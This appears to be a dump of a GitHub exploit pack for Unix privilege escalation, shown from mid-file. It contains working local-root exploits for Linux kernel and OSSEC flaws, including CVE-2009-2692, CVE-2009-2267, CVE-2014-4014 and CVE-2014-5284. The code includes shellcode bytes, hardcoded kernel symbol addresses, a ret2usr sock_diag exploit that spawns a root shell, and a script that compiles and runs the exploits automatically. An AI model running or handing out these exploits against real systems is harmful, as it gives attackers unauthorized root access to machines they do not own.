mem->own_the_kernel[i] = exp_state->own_the_kernel; 56 | 57 | return 0; 58 | } 59 | 60 | int trigger(void) 61 | { 62 | struct sockaddr sock = { 63 | .sa_family = AF_UNSPEC, 64 | .sa_data = "CamusIsAwesome", 65 | }; 66 | char buf[1024] = {0}; 67 | int fd; 68 | 69 | fd = socket(PF_INET, SOCK_DGRAM, 0); 70 | if (fd < 0) { 71 | fprintf(stdout, "failed to create socket\n"); 72 | return 0; 73 | } 74 | 75 | sendto(fd, buf, 1024, MSG_PROXY | MSG_MORE, &sock, sizeof(sock)); 76 | sendto(fd, buf, 1024, 0, &sock, sizeof(sock)); 77 | 78 | return 1; 79 | } 80 | 81 | int post(void) 82 | { 83 | return RUN_ROOTSHELL; 84 | } 85 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_vmware.c: -------------------------------------------------------------------------------- 1 | /* all credits to Tavis Ormandy/Julien Tinnes 2 | 3 | I (being Ingo Molnar, of course) simply replaced the ring0 XSS 4 | with more suitable shellcode 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include "exp_framework.h" 16 | 17 | struct exploit_state *exp_state; 18 | 19 | char *desc = "CVE-2009-2267: VMWare vm86 guest local root"; 20 | char *cve = "CVE-2009-2267"; 21 | 22 | #define REAL_TO_VIRT(cs, ip) ((void *)(((cs) << 4) + ((ip) & 0xffff))) 23 | #define EFLAGS_TF_MASK 0x100 24 | 25 | void enter_vm86(void) 26 | { 27 | struct vm86plus_struct vm = {0}; 28 | 29 | vm.cpu_type = CPU_586; 30 | 31 | vm.regs.eflags = EFLAGS_TF_MASK; 32 | vm.regs.esp = 0xdeadc01d; 33 | vm.regs.eip = 0x00000000; 34 | vm.regs.cs = 0x0090; 35 | vm.regs.ss = 0xffff; 36 | 37 | memcpy(REAL_TO_VIRT(vm.regs.cs, vm.regs.eip), 38 | "\x9a\xdd\xcc\x00\x00\xbb\xaa", 7); 39 | 40 | vm86(VM86_ENTER, &vm); 41 | 42 | return; 43 | } 44 | 45 | int prepare(unsigned char *buf) 46 | { 47 | char *newbuf; 48 | 49 | newbuf = (char *)mremap(buf, PAGE_SIZE, 1024 * 1024, 0); 50 | if (newbuf == MAP_FAILED) { 51 | printf("failed to 
remap NULL page\n"); 52 | exit(1); 53 | } 54 | 55 | // mov esp, edi 56 | buf[0] = '\x89'; 57 | buf[1] = '\xfc'; 58 | // sub esp, 0x50 59 | buf[2] = '\x83'; 60 | buf[3] = '\xec'; 61 | buf[4] = '\x50'; 62 | // call own_the_kernel 63 | buf[5] = '\xff'; 64 | buf[6] = '\x15'; 65 | *(unsigned int *)&buf[7] = (unsigned int)buf + 17; 66 | // jmp exit_kernel 67 | buf[11] = '\xff'; 68 | buf[12] = '\x25'; 69 | *(unsigned int *)&buf[13] = (unsigned int)buf + 21; 70 | *(unsigned long *)&buf[17] = (unsigned long)exp_state->own_the_kernel; 71 | *(unsigned long *)&buf[21] = (unsigned long)exp_state->exit_kernel; 72 | 73 | return 0; 74 | } 75 | 76 | int requires_null_page = 1; 77 | 78 | int get_exploit_state_ptr(struct exploit_state *ptr) 79 | { 80 | exp_state = ptr; 81 | return 0; 82 | } 83 | 84 | int trigger(void) 85 | { 86 | enter_vm86(); 87 | 88 | return 1; 89 | } 90 | 91 | int post(void) 92 | { 93 | return RUN_ROOTSHELL; 94 | } 95 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_wunderbar.c: -------------------------------------------------------------------------------- 1 | /* wunderbar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "exp_framework.h" 9 | 10 | struct exploit_state *exp_state; 11 | 12 | #define DOMAINS_STOP -1 13 | #define VIDEO_SIZE 4171600 14 | #ifndef IPPROTO_SCTP 15 | #define IPPROTO_SCTP 132 16 | #endif 17 | #ifndef PX_PROTO_OL2TP 18 | #define PX_PROTO_OL2TP 1 19 | #endif 20 | #ifndef PF_IUCV 21 | #define PF_IUCV 32 22 | #endif 23 | 24 | const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 }, 25 | {PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 }, 26 | {PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 }, 27 | {PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 }, 28 | {PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP }, 29 | {PF_PPPOX, SOCK_DGRAM, 0 }, 30 | {PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP }, 31 | {DOMAINS_STOP, 0, 0 } 32 | }; 33 | 34 | char 
*desc = "Wunderbar Emporium: Linux 2.X sendpage() local root"; 35 | char *cve = "CVE-2009-2692"; 36 | 37 | int prepare(unsigned char *buf) 38 | { 39 | return STRAIGHT_UP_EXECUTION_AT_NULL; 40 | } 41 | 42 | int requires_null_page = 1; 43 | 44 | int get_exploit_state_ptr(struct exploit_state *ptr) 45 | { 46 | exp_state = ptr; 47 | return 0; 48 | } 49 | 50 | int trigger(void) 51 | { 52 | while (exp_state->got_ring0 == 0) { 53 | char template[] = "/tmp/sendfile.XXXXXX"; 54 | int d; 55 | int in, out; 56 | 57 | // Setup source descriptor 58 | if ((in = mkstemp(template)) < 0) { 59 | fprintf(stdout, "failed to open input descriptor, %m\n"); 60 | return 0; 61 | } 62 | 63 | unlink(template); 64 | 65 | // Find a vulnerable domain 66 | for (d = 0; domains[d][0] != DOMAINS_STOP; d++) { 67 | if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0) 68 | break; 69 | } 70 | 71 | if (out < 0) { 72 | fprintf(stdout, "unable to find a vulnerable domain, sorry\n"); 73 | return 0; 74 | } 75 | 76 | // Truncate input file to some large value 77 | ftruncate(in, getpagesize()); 78 | 79 | // sendfile() to trigger the bug. 
80 | sendfile(out, in, NULL, getpagesize()); 81 | } 82 | 83 | return 1; 84 | } 85 | 86 | int post(void) 87 | { 88 | return RUN_ROOTSHELL; 89 | } 90 | -------------------------------------------------------------------------------- /2013/enlightenment/funny.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/enlightenment/funny.jpg -------------------------------------------------------------------------------- /2013/enlightenment/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 3; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 3; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 3; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 3; 37 | } 38 | -------------------------------------------------------------------------------- /2013/enlightenment/run_nonnull_exploits.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ./run_null_exploits.sh nonnull 4 | -------------------------------------------------------------------------------- /2013/enlightenment/run_null_exploits.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | GCC=gcc 3 | IS_64=`uname -m` 4 | LINK_FLAG="-ldl" 5 | OPT_FLAG="-fomit-frame-pointer -O2" 6 | if [ "$IS_64" = "x86_64" ]; then 7 | OPT_FLAG="-m64 -fomit-frame-pointer -O2" 8 | fi 9 | if [ "$1" != "" ]; then 10 | OPT_FLAG="$OPT_FLAG -DNON_NULL_ONLY" 11 | elif [ -d /usr/include/selinux ]; then 12 | OPT_FLAG="$OPT_FLAG -DHAVE_SELINUX -lselinux" 13 | fi 14 | 15 | for FILE in exp_*.c; do 16 | printf "Compiling $FILE..." 17 | $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null 18 | if [ "$?" = "1" ]; then 19 | $GCC -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null 20 | if [ "$?" = "1" ]; then 21 | printf "failed.\n" 22 | else 23 | printf "OK.\n" 24 | fi 25 | else 26 | printf "OK.\n" 27 | fi 28 | done 29 | 30 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 31 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 32 | if [ "$1" != "" -o "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 33 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 34 | mv exploit.c exploit2.c 35 | mv exploit1.c exploit.c 36 | $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 37 | if [ "$?" = "1" ]; then 38 | $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 39 | fi 40 | if [ "$?" = "1" ]; then 41 | $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 42 | fi 43 | mv -f exploit2.c exploit.c 44 | ./exploit 45 | elif [ ! -f '/selinux/enforce' ]; then 46 | killall -9 pulseaudio 2> /dev/null 47 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 48 | mv exploit.c exploit2.c 49 | mv exploit1.c exploit.c 50 | $GCC -fno-stack-protector -fno-pie -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 51 | if [ "$?" 
= "1" ]; then 52 | $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 53 | fi 54 | if [ "$?" = "1" ]; then 55 | $GCC -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 56 | fi 57 | mv -f exploit2.c exploit.c 58 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 59 | mv pwnkernel.c pwnkernel2.c 60 | mv pwnkernel1.c pwnkernel.c 61 | $GCC $OPT_FLAG -o pwnkernel pwnkernel.c $LINK_FLAG 62 | mv -f pwnkernel2.c pwnkernel.c 63 | ./pwnkernel 64 | else 65 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 66 | mv exploit.c exploit2.c 67 | mv exploit1.c exploit.c 68 | $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 69 | if [ "$?" = "1" ]; then 70 | $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 71 | fi 72 | if [ "$?" = "1" ]; then 73 | $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 74 | fi 75 | mv -f exploit2.c exploit.c 76 | ./exploit 77 | fi 78 | -------------------------------------------------------------------------------- /2014/1-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/1-2 -------------------------------------------------------------------------------- /2014/3.4 and up/recvmmsg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/3.4 and up/recvmmsg -------------------------------------------------------------------------------- /2014/3.4 and up/timeoutpwn: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/3.4 and up/timeoutpwn -------------------------------------------------------------------------------- /2014/CVE-2014-4014-setgid.c: -------------------------------------------------------------------------------- 1 | /** 2 | * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC 3 | * 4 | * Vitaly Nikolenko 5 | * http://hashcrack.org 6 | * 7 | * Usage: ./poc [file_path] 8 | * 9 | * where file_path is the file on which you want to set the sgid bit 10 | */ 11 | #define _GNU_SOURCE 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define STACK_SIZE (1024 * 1024) 23 | static char child_stack[STACK_SIZE]; 24 | 25 | struct args { 26 | int pipe_fd[2]; 27 | char *file_path; 28 | }; 29 | 30 | static int child(void *arg) { 31 | struct args *f_args = (struct args *)arg; 32 | char c; 33 | 34 | // close stdout 35 | close(f_args->pipe_fd[1]); 36 | 37 | assert(read(f_args->pipe_fd[0], &c, 1) == 0); 38 | 39 | // set the setgid bit 40 | chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); 41 | 42 | return 0; 43 | } 44 | 45 | int main(int argc, char *argv[]) { 46 | int fd; 47 | pid_t pid; 48 | char mapping[1024]; 49 | char map_file[PATH_MAX]; 50 | struct args f_args; 51 | 52 | assert(argc == 2); 53 | 54 | f_args.file_path = argv[1]; 55 | // create a pipe for synching the child and parent 56 | assert(pipe(f_args.pipe_fd) != -1); 57 | 58 | pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); 59 | assert(pid != -1); 60 | 61 | // get the current uid outside the namespace 62 | snprintf(mapping, 1024, "0 %d 1\n", getuid()); 63 | 64 | // update uid and gid maps in the child 65 | snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); 66 | fd = open(map_file, O_RDWR); assert(fd != -1); 67 | 68 | assert(write(fd, 
mapping, strlen(mapping)) == strlen(mapping)); 69 | close(f_args.pipe_fd[1]); 70 | 71 | assert (waitpid(pid, NULL, 0) != -1); 72 | } -------------------------------------------------------------------------------- /2014/CVE-2014-5284.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation 3 | # Date: 14-11-14 4 | # Exploit Author: skynet-13 5 | # Vendor Homepage: www.ossec.net/ 6 | # Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz 7 | # Version: OSSEC - 2.8 8 | # Tested on: Ubunutu x86_64 9 | # CVE : 2014-5284 10 | 11 | # Created from Research by 12 | # Jeff Petersen 13 | # Roka Security LLC 14 | # jpetersen@rokasecurity.com 15 | # Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 16 | 17 | # Run this on target machine and follow instructions to execute command as root 18 | 19 | from twisted.internet import inotify 20 | from twisted.python import filepath 21 | from twisted.internet import reactor 22 | import os 23 | import optparse 24 | import signal 25 | 26 | 27 | class HostDenyExploiter(object): 28 | 29 | def __init__(self, path_to_watch, cmd): 30 | self.path = path_to_watch 31 | self.notifier = inotify.INotify() 32 | self.exploit = cmd 33 | 34 | def create_files(self): 35 | print "==============================================" 36 | print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." 37 | 38 | for i in range(300, 65536): 39 | filename = "/tmp/hosts.deny.%s" % i 40 | f = open(filename, 'w') 41 | f.write("") 42 | f.close() 43 | 44 | def watch_files(self): 45 | print "==============================================" 46 | print "Monitoring tmp for file change...." 
47 | print "ssh into the system a few times with an incorrect password" 48 | print "Then wait for up to 10 mins" 49 | print "==============================================" 50 | self.notifier.startReading() 51 | self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change]) 52 | 53 | def write_exploit_to_file(self, path): 54 | print 'Writing exploit to this file' 55 | f = open(str(path).split("'")[1], 'w') 56 | f.write(' sshd : ALL : twist %s \n' % self.exploit) 57 | f.close() 58 | print "==============================================" 59 | print " ssh in again to execute the command" 60 | print "==============================================" 61 | print " End Prog." 62 | os.kill(os.getpid(), signal.SIGUSR1) 63 | 64 | def on_file_change(self, watch, path, mask): 65 | print 'File: ', str(path).split("'")[1], ' has just been modified' 66 | self.notifier.stopReading() 67 | self.write_exploit_to_file(path) 68 | 69 | 70 | if __name__ == '__main__': 71 | parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") 72 | parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') 73 | (options, args) = parser.parse_args() 74 | cmd = options.cmd 75 | if options.cmd is None: 76 | print parser.usage 77 | exit(0) 78 | ex = HostDenyExploiter('/tmp', cmd) 79 | ex.create_files() 80 | ex.watch_files() 81 | reactor.run() 82 | exit(0) -------------------------------------------------------------------------------- /2014/ekit/include/hdr.txt: -------------------------------------------------------------------------------- 1 | |=-------------------------------------------------------------------------=| 2 | |=------[ Return-to-direct-mapped memory (ret2dir) Exploitation Kit ]------=| 3 | |=-------------------------------------------------------------------------=| 4 | |=-------[ Network Security Lab (NSL) # http://nsl.cs.columbia.edu ]-------=| 5 | |=-------------------------[ Columbia 
University ]-------------------------=| 6 | |=-------------[ Vasileios P. Kemerlis (vpk@cs.columbia.edu) ]-------------=| 7 | |=-------------------[ http://www.cs.columbia.edu/~vpk ]-------------------=| 8 | |=-------------------------------------------------------------------------=| 9 | -------------------------------------------------------------------------------- /2014/ekit/ret2dir/kernwrite_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/kernwrite_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2dir/kernwrite_amd64-pax: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/kernwrite_amd64-pax -------------------------------------------------------------------------------- /2014/ekit/ret2dir/perf-events_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/perf-events_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2dir/rds_amd64-pax: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/rds_amd64-pax -------------------------------------------------------------------------------- /2014/ekit/ret2dir/sock-diag_amd64: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/sock-diag_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/kernwrite_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/kernwrite_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/perf-events_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/perf-events_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/rds_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/rds_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/sock-diag_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/sock-diag_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/sock-diag_amd64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define NETLINK_SOCK_DIAG 4 15 | #define 
SOCK_DIAG_BY_FAMILY 20 16 | #define UDIAG_SHOW_NAME 0x00000001 17 | #define UDIAG_SHOW_PEER 0x00000004 18 | #define UDIAG_SHOW_RQLEN 0x00000010 19 | 20 | struct unix_diag_req { 21 | __u8 sdiag_family; 22 | __u8 sdiag_protocol; 23 | __u16 pad; 24 | __u32 udiag_states; 25 | __u32 udiag_ino; 26 | __u32 udiag_show; 27 | __u32 udiag_cookie[2]; 28 | }; 29 | 30 | 31 | 32 | typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 33 | typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 34 | _commit_creds commit_creds; 35 | _prepare_kernel_cred prepare_kernel_cred; 36 | unsigned long sock_diag_handlers, nl_table; 37 | 38 | int __attribute__((regparm(3))) 39 | x() 40 | { 41 | commit_creds(prepare_kernel_cred(0)); 42 | return -1; 43 | } 44 | 45 | char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 46 | 47 | int main() { 48 | int fd; 49 | unsigned long mmap_start, mmap_size = 0x10000; 50 | unsigned family; 51 | struct { 52 | struct nlmsghdr nlh; 53 | struct unix_diag_req r; 54 | } req; 55 | char buf[8192]; 56 | 57 | if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ 58 | printf("Can't create sock diag socket\n"); 59 | return -1; 60 | } 61 | 62 | memset(&req, 0, sizeof(req)); 63 | req.nlh.nlmsg_len = sizeof(req); 64 | req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; 65 | req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; 66 | req.nlh.nlmsg_seq = 123456; 67 | 68 | req.r.udiag_states = -1; 69 | req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; 70 | 71 | /* Ubuntu 12.10 x86_64 */ 72 | req.r.sdiag_family = 0x37; 73 | commit_creds = (_commit_creds) 0xffffffff8107d180; 74 | prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410; 75 | mmap_start = 0x1a000; 76 | 77 | if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, 78 | MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { 79 | 80 | printf("mmap fault\n"); 81 | exit(1); 82 | } 
83 | 84 | *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x; 85 | memset((void *)mmap_start, 0x90, mmap_size); 86 | memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1)); 87 | 88 | send(fd, &req, sizeof(req), 0); 89 | if(!getuid()) 90 | system("/bin/sh"); 91 | } 92 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/Makefile: -------------------------------------------------------------------------------- 1 | obj-m = kernwrite.o 2 | 3 | M=$(shell pwd) 4 | 5 | all: 6 | make -C /lib/modules/$(shell uname -r)/build/ M=$(M) modules 7 | 8 | clean: 9 | rm -rf *.ko *.o *.mod* .*.cmd modules.order Module.symvers .tmp_versions 10 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/Module.symvers -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/VERSION: -------------------------------------------------------------------------------- 1 | 2.718alpha 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.ko -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, 
VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x67f517d4, "module_layout" }, 21 | { 0x38f6de07, "debugfs_create_file" }, 22 | { 0x15882509, "debugfs_create_dir" }, 23 | { 0xf0fdf6cb, "__stack_chk_fail" }, 24 | { 0xb742fd7, "simple_strtol" }, 25 | { 0x167e7f9d, "__get_user_1" }, 26 | { 0xfb578fc5, "memset" }, 27 | { 0x26948d96, "copy_user_enhanced_fast_string" }, 28 | { 0xafb8c6ff, "copy_user_generic_string" }, 29 | { 0x72a98fdb, "copy_user_generic_unrolled" }, 30 | { 0x4993e8f0, "current_tinfo" }, 31 | { 0x88db9f48, "__check_object_size" }, 32 | { 0xa1c76e0a, "_cond_resched" }, 33 | { 0x27e1a049, "printk" }, 34 | { 0xde2aad88, "debugfs_remove" }, 35 | { 0xbdfb6dbb, "__fentry__" }, 36 | }; 37 | 38 | static const char __module_depends[] 39 | __used 40 | __attribute__((section(".modinfo"))) = 41 | "depends="; 42 | 43 | 44 | MODULE_INFO(srcversion, "C4B85F8A3C757995452A2F6"); 45 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.mod.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/vpk/ret2dir/exploits/kernwrite/kernwrite.ko 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/Makefile: -------------------------------------------------------------------------------- 1 | obj-m = kernwrite.o 2 | 3 | M=$(shell pwd) 4 | 5 | all: 6 | make -C /lib/modules/$(shell uname -r)/build/ M=$(M) modules 7 | 8 | clean: 9 | rm -rf *.ko *.o *.mod* .*.cmd modules.order Module.symvers .tmp_versions 10 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/Module.symvers -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/VERSION: -------------------------------------------------------------------------------- 1 | 2.718alpha 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.ko -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.mod.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x9a31bb74, "module_layout" }, 21 | { 0xb2815f09, "debugfs_create_file" }, 22 | { 0x26b09686, "debugfs_create_dir" }, 23 | { 0xf0fdf6cb, "__stack_chk_fail" }, 24 | { 0xb742fd7, "simple_strtol" }, 25 | { 0x4f6b400b, "_copy_from_user" }, 26 | { 0xa1c76e0a, "_cond_resched" }, 27 | { 0x27e1a049, "printk" }, 28 | { 0x3dbb1c73, "debugfs_remove" }, 29 | { 0xbdfb6dbb, "__fentry__" }, 30 | }; 31 | 32 | static const char __module_depends[] 33 | __used 34 | __attribute__((section(".modinfo"))) = 35 | "depends="; 36 | 37 | 38 | MODULE_INFO(srcversion, "C4B85F8A3C757995452A2F6"); 39 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.mod.o: -------------------------------------------------------------------------------- 